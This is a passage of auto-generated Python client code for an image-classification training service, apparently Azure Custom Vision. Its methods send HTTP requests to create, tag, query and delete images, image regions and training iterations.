url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ImageRegionProposal', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_image_region_proposals.metadata = {'url': '/projects/{projectId}/images/{imageId}/regionproposals'}
def create_images_from_files(
self, project_id, images=None, tag_ids=None, custom_headers=None, raw=False, **operation_config):
"""Add the provided batch of images to the set of training images.
This API accepts a batch of files, and optionally tags, to create
images. There is a limit of 64 images and 20 tags.
:param project_id: The project id.
:type project_id: str
:param images:
:type images:
list[~azure.cognitiveservices.vision.customvision.training.models.ImageFileCreateEntry]
:param tag_ids:
:type tag_ids: list[str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ImageCreateSummary or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.ImageCreateSummary
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
batch = models.ImageFileCreateBatch(images=images, tag_ids=tag_ids)
# Construct URL
url = self.create_images_from_files.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(batch, 'ImageFileCreateBatch')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ImageCreateSummary', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_images_from_files.metadata = {'url': '/projects/{projectId}/images/files'}
def get_images_by_ids(
self, project_id, image_ids=None, iteration_id=None, custom_headers=None, raw=False, **operation_config):
"""Get images by id for a given project iteration.
This API will return a set of Images for the specified tags and
optionally iteration. If no iteration is specified the
current workspace is used.
:param project_id: The project id.
:type project_id: str
:param image_ids: The list of image ids to retrieve. Limited to 256.
:type image_ids: list[str]
:param iteration_id: The iteration id. Defaults to workspace.
:type iteration_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype:
list[~azure.cognitiveservices.vision.customvision.training.models.Image]
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.get_images_by_ids.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if image_ids is not None:
query_parameters['imageIds'] = self._serialize.query("image_ids", image_ids, '[str]', div=',', max_items=256, min_items=0)
if iteration_id is not None:
query_parameters['iterationId'] = self._serialize.query("iteration_id", iteration_id, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('[Image]', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_images_by_ids.metadata = {'url': '/projects/{projectId}/images/id'}
def create_images_from_predictions(
self, project_id, images=None, tag_ids=None, custom_headers=None, raw=False, **operation_config):
"""Add the specified predicted images to the set of training images.
This API creates a batch of images from predicted images specified.
There is a limit of 64 images and 20 tags.
:param project_id: The project id.
:type project_id: str
:param images:
:type images:
list[~azure.cognitiveservices.vision.customvision.training.models.ImageIdCreateEntry]
:param tag_ids:
:type tag_ids: list[str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ImageCreateSummary or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.ImageCreateSummary
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
batch = models.ImageIdCreateBatch(images=images, tag_ids=tag_ids)
# Construct URL
url = self.create_images_from_predictions.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(batch, 'ImageIdCreateBatch')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ImageCreateSummary', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_images_from_predictions.metadata = {'url': '/projects/{projectId}/images/predictions'}
def create_image_regions(
self, project_id, regions=None, custom_headers=None, raw=False, **operation_config):
"""Create a set of image regions.
This API accepts a batch of image regions, and optionally tags, to
update existing images with region information.
There is a limit of 64 entries in the batch.
:param project_id: The project id.
:type project_id: str
:param regions:
:type regions:
list[~azure.cognitiveservices.vision.customvision.training.models.ImageRegionCreateEntry]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ImageRegionCreateSummary or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.ImageRegionCreateSummary
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
batch = models.ImageRegionCreateBatch(regions=regions)
# Construct URL
url = self.create_image_regions.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(batch, 'ImageRegionCreateBatch')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ImageRegionCreateSummary', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_image_regions.metadata = {'url': '/projects/{projectId}/images/regions'}
def delete_image_regions(
self, project_id, region_ids, custom_headers=None, raw=False, **operation_config):
"""Delete a set of image regions.
:param project_id: The project id.
:type project_id: str
:param region_ids: Regions to delete. Limited to 64.
:type region_ids: list[str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.delete_image_regions.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['regionIds'] = self._serialize.query("region_ids", region_ids, '[str]', div=',', max_items=64, min_items=0)
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [204]:
raise models.CustomVisionErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
delete_image_regions.metadata = {'url': '/projects/{projectId}/images/regions'}
def query_suggested_images(
self, project_id, iteration_id, query, custom_headers=None, raw=False, **operation_config):
"""Get untagged images whose suggested tags match given tags. Returns
empty array if no images are found.
This API will fetch untagged images filtered by suggested tags Ids. It
returns an empty array if no images are found.
:param project_id: The project id.
:type project_id: str
:param iteration_id: IterationId to use for the suggested tags and
regions.
:type iteration_id: str
:param query: Contains properties we need to query suggested images.
:type query:
~azure.cognitiveservices.vision.customvision.training.models.SuggestedTagAndRegionQueryToken
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: SuggestedTagAndRegionQuery or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.SuggestedTagAndRegionQuery
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.query_suggested_images.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['iterationId'] = self._serialize.query("iteration_id", iteration_id, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(query, 'SuggestedTagAndRegionQueryToken')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SuggestedTagAndRegionQuery', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
query_suggested_images.metadata = {'url': '/projects/{projectId}/images/suggested'}
def query_suggested_image_count(
self, project_id, iteration_id, tag_ids=None, threshold=None, custom_headers=None, raw=False, **operation_config):
"""Get count of images whose suggested tags match given tags and their
probabilities are greater than or equal to the given threshold. Returns
count as 0 if none found.
This API takes in tagIds to get count of untagged images per suggested
tags for a given threshold.
:param project_id: The project id.
:type project_id: str
:param iteration_id: IterationId to use for the suggested tags and
regions.
:type iteration_id: str
:param tag_ids: Existing TagIds in project to get suggested tags count
for.
:type tag_ids: list[str]
:param threshold: Confidence threshold to filter suggested tags on.
:type threshold: float
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: dict or ClientRawResponse if raw=true
:rtype: dict[str, int] or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
query = models.TagFilter(tag_ids=tag_ids, threshold=threshold)
# Construct URL
url = self.query_suggested_image_count.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['iterationId'] = self._serialize.query("iteration_id", iteration_id, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(query, 'TagFilter')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('{int}', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
query_suggested_image_count.metadata = {'url': '/projects/{projectId}/images/suggested/count'}
def get_tagged_images(
self, project_id, iteration_id=None, tag_ids=None, order_by=None, take=50, skip=0, custom_headers=None, raw=False, **operation_config):
"""Get tagged images for a given project iteration.
This API supports batching and range selection. By default it will only
return first 50 images matching images.
Use the {take} and {skip} parameters to control how many images to
return in a given batch.
The filtering is on an and/or relationship. For example, if the
provided tag ids are for the "Dog" and
"Cat" tags, then only images tagged with Dog and/or Cat will be
returned.
:param project_id: The project id.
:type project_id: str
:param iteration_id: The iteration id. Defaults to workspace.
:type iteration_id: str
:param tag_ids: A list of tags ids to filter the images. Defaults to
all tagged images when null. Limited to 20.
:type tag_ids: list[str]
:param order_by: The ordering. Defaults to newest. Possible values
include: 'Newest', 'Oldest'
:type order_by: str
:param take: Maximum number of images to return. Defaults to 50,
limited to 256.
:type take: int
:param skip: Number of images to skip before beginning the image
batch. Defaults to 0.
:type skip: int
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype:
list[~azure.cognitiveservices.vision.customvision.training.models.Image]
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.get_tagged_images.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if iteration_id is not None:
query_parameters['iterationId'] = self._serialize.query("iteration_id", iteration_id, 'str')
if tag_ids is not None:
query_parameters['tagIds'] = self._serialize.query("tag_ids", tag_ids, '[str]', div=',', max_items=20, min_items=0)
if order_by is not None:
query_parameters['orderBy'] = self._serialize.query("order_by", order_by, 'str')
if take is not None:
query_parameters['take'] = self._serialize.query("take", take, 'int', maximum=256, minimum=0)
if skip is not None:
query_parameters['skip'] = self._serialize.query("skip", skip, 'int')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('[Image]', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_tagged_images.metadata = {'url': '/projects/{projectId}/images/tagged'}
def get_tagged_image_count(
self, project_id, iteration_id=None, tag_ids=None, custom_headers=None, raw=False, **operation_config):
"""Gets the number of images tagged with the provided {tagIds}.
The filtering is on an and/or relationship. For example, if the
provided tag ids are for the "Dog" and
"Cat" tags, then only images tagged with Dog and/or Cat will be
returned.
:param project_id: The project id.
:type project_id: str
:param iteration_id: The iteration id. Defaults to workspace.
:type iteration_id: str
:param tag_ids: A list of tags ids to filter the images to count.
Defaults to all tags when null.
:type tag_ids: list[str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: int or ClientRawResponse if raw=true
:rtype: int or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.get_tagged_image_count.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if iteration_id is not None:
query_parameters['iterationId'] = self._serialize.query("iteration_id", iteration_id, 'str')
if tag_ids is not None:
query_parameters['tagIds'] = self._serialize.query("tag_ids", tag_ids, '[str]', div=',')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('int', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_tagged_image_count.metadata = {'url': '/projects/{projectId}/images/tagged/count'}
def create_image_tags(
self, project_id, tags=None, custom_headers=None, raw=False, **operation_config):
"""Associate a set of images with a set of tags.
:param project_id: The project id.
:type project_id: str
:param tags: Image Tag entries to include in this batch.
:type tags:
list[~azure.cognitiveservices.vision.customvision.training.models.ImageTagCreateEntry]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ImageTagCreateSummary or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.ImageTagCreateSummary
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
batch = models.ImageTagCreateBatch(tags=tags)
# Construct URL
url = self.create_image_tags.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(batch, 'ImageTagCreateBatch')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ImageTagCreateSummary', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_image_tags.metadata = {'url': '/projects/{projectId}/images/tags'}
def delete_image_tags(
self, project_id, image_ids, tag_ids, custom_headers=None, raw=False, **operation_config):
"""Remove a set of tags from a set of images.
:param project_id: The project id.
:type project_id: str
:param image_ids: Image ids. Limited to 64 images.
:type image_ids: list[str]
:param tag_ids: Tags to be deleted from the specified images. Limited
to 20 tags.
:type tag_ids: list[str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.delete_image_tags.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['imageIds'] = self._serialize.query("image_ids", image_ids, '[str]', div=',', max_items=64, min_items=0)
query_parameters['tagIds'] = self._serialize.query("tag_ids", tag_ids, '[str]', div=',', max_items=20, min_items=0)
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [204]:
raise models.CustomVisionErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
delete_image_tags.metadata = {'url': '/projects/{projectId}/images/tags'}
def get_untagged_images(
self, project_id, iteration_id=None, order_by=None, take=50, skip=0, custom_headers=None, raw=False, **operation_config):
"""Get untagged images for a given project iteration.
This API supports batching and range selection. By default it will only
return first 50 images matching images.
Use the {take} and {skip} parameters to control how many images to
return in a given batch.
:param project_id: The project id.
:type project_id: str
:param iteration_id: The iteration id. Defaults to workspace.
:type iteration_id: str
:param order_by: The ordering. Defaults to newest. Possible values
include: 'Newest', 'Oldest'
:type order_by: str
:param take: Maximum number of images to return. Defaults to 50,
limited to 256.
:type take: int
:param skip: Number of images to skip before beginning the image
batch. Defaults to 0.
:type skip: int
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype:
list[~azure.cognitiveservices.vision.customvision.training.models.Image]
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.get_untagged_images.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if iteration_id is not None:
query_parameters['iterationId'] = self._serialize.query("iteration_id", iteration_id, 'str')
if order_by is not None:
query_parameters['orderBy'] = self._serialize.query("order_by", order_by, 'str')
if take is not None:
query_parameters['take'] = self._serialize.query("take", take, 'int', maximum=256, minimum=0)
if skip is not None:
query_parameters['skip'] = self._serialize.query("skip", skip, 'int')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('[Image]', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_untagged_images.metadata = {'url': '/projects/{projectId}/images/untagged'}
def get_untagged_image_count(
self, project_id, iteration_id=None, custom_headers=None, raw=False, **operation_config):
"""Gets the number of untagged images.
This API returns the images which have no tags for a given project and
optionally an iteration. If no iteration is specified the
current workspace is used.
:param project_id: The project id.
:type project_id: str
:param iteration_id: The iteration id. Defaults to workspace.
:type iteration_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: int or ClientRawResponse if raw=true
:rtype: int or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.get_untagged_image_count.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if iteration_id is not None:
query_parameters['iterationId'] = self._serialize.query("iteration_id", iteration_id, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('int', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_untagged_image_count.metadata = {'url': '/projects/{projectId}/images/untagged/count'}
def create_images_from_urls(
self, project_id, images=None, tag_ids=None, custom_headers=None, raw=False, **operation_config):
"""Add the provided images urls to the set of training images.
This API accepts a batch of urls, and optionally tags, to create
images. There is a limit of 64 images and 20 tags.
:param project_id: The project id.
:type project_id: str
:param images:
:type images:
list[~azure.cognitiveservices.vision.customvision.training.models.ImageUrlCreateEntry]
:param tag_ids:
:type tag_ids: list[str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ImageCreateSummary or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.ImageCreateSummary
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
batch = models.ImageUrlCreateBatch(images=images, tag_ids=tag_ids)
# Construct URL
url = self.create_images_from_urls.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(batch, 'ImageUrlCreateBatch')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ImageCreateSummary', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_images_from_urls.metadata = {'url': '/projects/{projectId}/images/urls'}
def get_iterations(
self, project_id, custom_headers=None, raw=False, **operation_config):
"""Get iterations for the project.
:param project_id: The project id.
:type project_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype:
list[~azure.cognitiveservices.vision.customvision.training.models.Iteration]
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.get_iterations.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('[Iteration]', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_iterations.metadata = {'url': '/projects/{projectId}/iterations'}
def get_iteration(
self, project_id, iteration_id, custom_headers=None, raw=False, **operation_config):
"""Get a specific iteration.
:param project_id: The id of the project the iteration belongs to.
:type project_id: str
:param iteration_id: The id of the iteration to get.
:type iteration_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Iteration or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.Iteration
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.get_iteration.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str'),
'iterationId': self._serialize.url("iteration_id", iteration_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
